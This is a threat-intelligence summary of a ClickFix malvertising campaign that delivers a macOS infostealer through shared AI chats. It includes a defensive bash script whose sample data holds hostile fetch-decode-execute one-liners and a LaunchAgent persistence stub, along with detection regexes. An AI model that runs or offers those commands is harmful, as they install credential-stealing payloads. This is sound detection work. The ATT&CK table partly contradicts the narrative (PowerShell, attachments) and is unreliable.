EXECUTIVE SUMMARY
Threat actors behind the campaign are loosely organized cybercriminal groups that have adopted the ClickFix malvertising model. They distribute paid search ads that mimic popular AI development tools and macOS utility products, directing users to malicious download pages hosted on free static‐site services before moving the payload onto the Claude.ai shared‐chat feature. The operation targets software developers, IT professionals, and macOS users, with a heavy concentration in the Asia‐Pacific region—particularly Taiwan, Singapore and Japan. Their primary objective is credential theft, harvesting browser cookies, SSH keys and cryptocurrency wallet files for resale.
The infection chain begins when a user clicks a sponsored ad that appears alongside legitimate AI‐tool search results. The link leads to a page on a reputable domain that hosts a copy‐and‐paste command, often presented as a fix or installation step. When the command runs, a short script downloads an encoded payload from a remote host, decodes it and executes the MacSync infostealer. The malware then gathers credentials, key material and wallet files before transmitting them to a command‐and‐control server.
Persistence is achieved through a macOS LaunchAgent, and the attacker can issue further commands via the same shared‐chat conduit. The campaign matters because it exploits trusted domains and a native collaboration feature, so traditional URL‐based blocks are ineffective and organizations remain exposed to credential loss. Detection is hampered by the absence of obviously suspicious infrastructure: the malicious content resides on a legitimate AI platform that passes most web‐gateway checks. Defences should include web‐filter policies that scrutinize sponsored search ads, monitoring for unexpected terminal commands (in particular copy‐and‐paste one‐liners that fetch, decode and execute a payload), and least privilege on macOS workstations. Endpoint detection with behavioral analytics, regular backups and continuous security awareness training for developers further reduce the risk of successful compromise.
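The copy‐and‐paste stage and the LaunchAgent persistence described above are both visible in local telemetry. The script below is an added example written for this summary, not code from Trend Micro's report or from the campaign itself. It runs two triage checks against constructed data: it flags process command lines that match the "paste this into Terminal" pattern (encoded payload fetched, decoded and piped into a shell), and it scans a directory of LaunchAgent plists for ProgramArguments that fetch or decode something. The example.invalid URLs, the plist labels and the regular expressions are assumptions made for the demonstration, not indicators from the report.

```shell
#!/usr/bin/env bash
# Added example for this summary (not code from the report or the campaign).
# All sample input is constructed; example.invalid URLs, plist labels and the
# regexes are assumptions for the demonstration, not indicators from the report.

# Constructed process-command sample, one command line per entry. The first
# three are ordinary developer activity; the last four mimic the ClickFix step.
# The base64 string in the fifth line decodes to another curl|sh one-liner.
sample_commands() {
    cat <<'EOF'
git clone https://github.com/example/repo.git
brew install jq
echo "hello" | base64
curl -fsSL https://example.invalid/fix.txt | base64 -d | bash
echo 'Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC94IHwgc2g=' | base64 --decode | sh
/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"
osascript -e 'do shell script "curl -s https://example.invalid/p | sh"'
EOF
}

# Returns 0 if one command line matches a ClickFix-style pattern, else 1.
is_clickfix_like() {
    local cmd="$1"
    # Decoded data piped straight into an interpreter.
    printf '%s' "$cmd" | grep -Eq \
        'base64[[:space:]]+(-d|-D|--decode)[[:space:]]*\|[[:space:]]*(ba|z)?sh([^[:alnum:]]|$)' && return 0
    # Remote content executed without touching disk: curl ... | sh
    printf '%s' "$cmd" | grep -Eq \
        '(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh([^[:alnum:]]|$)' && return 0
    # Same idea via command substitution: sh -c "$(curl ...)"
    printf '%s' "$cmd" | grep -Eq \
        '(ba|z)?sh[[:space:]]+-c[[:space:]]+"?\$\((curl|wget)' && return 0
    # AppleScript used as a launcher for a shell one-liner.
    printf '%s' "$cmd" | grep -Eq 'osascript[[:space:]]+-e.*do shell script' && return 0
    return 1
}

# Reads command lines on stdin, reports matches on stderr, prints the hit count.
count_clickfix_hits() {
    local line n=0
    while IFS= read -r line; do
        if is_clickfix_like "$line"; then
            printf 'FLAGGED: %s\n' "$line" >&2
            n=$((n + 1))
        fi
    done
    printf '%s\n' "$n"
}

# Writes two constructed LaunchAgent plists into a temp dir and prints its path:
# a benign scheduled backup and a persistence stub in the style described above.
make_sample_agents() {
    local dir
    dir=$(mktemp -d)
    cat > "$dir/com.example.backup.plist" <<'EOF'
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/local/bin/backup</string>
    <string>--daily</string>
  </array>
  <key>StartInterval</key><integer>86400</integer>
</dict>
</plist>
EOF
    cat > "$dir/com.example.updater.plist" <<'EOF'
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -fsSL https://example.invalid/u | base64 -d | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
    printf '%s\n' "$dir"
}

# Scans a LaunchAgents directory; reports suspicious plists on stderr, prints
# the count. Only the ProgramArguments array is inspected (that is the command).
scan_launch_agents() {
    local dir="$1" f n=0
    for f in "$dir"/*.plist; do
        [ -e "$f" ] || continue
        if sed -n '/<key>ProgramArguments<\/key>/,/<\/array>/p' "$f" \
            | grep -Eq 'curl|wget|base64|osascript|/tmp/|nohup'; then
            printf 'SUSPICIOUS AGENT: %s\n' "$f" >&2
            n=$((n + 1))
        fi
    done
    printf '%s\n' "$n"
}

main() {
    local dir
    echo "ClickFix-like command lines: $(sample_commands | count_clickfix_hits)"
    dir=$(make_sample_agents)
    echo "Suspicious launch agents: $(scan_launch_agents "$dir")"
    rm -rf "$dir"
}
main "$@"
```

To use it on real hosts, replace sample_commands with process-execution events from your EDR or shell-history collection and point scan_launch_agents at ~/Library/LaunchAgents and /Library/LaunchAgents on each Mac. The patterns are deliberately broad (curl | sh is also how many legitimate installers are distributed, which is exactly what the lure imitates), so treat hits as triage candidates to review against the user's expected activity rather than as a blocking rule.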
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Defense Evasion | T1027.006 | Obfuscated Files or Information | HTML Smuggling |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Discovery | T1082 | System Information Discovery | — |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details:
https://www.trendmicro.com/en_us/research/26/f/claudeai-shared-chat-abused-in-malvertising.html
https://cybersecuritynews.com/hackers-abuse-microsoft-fondue-exe/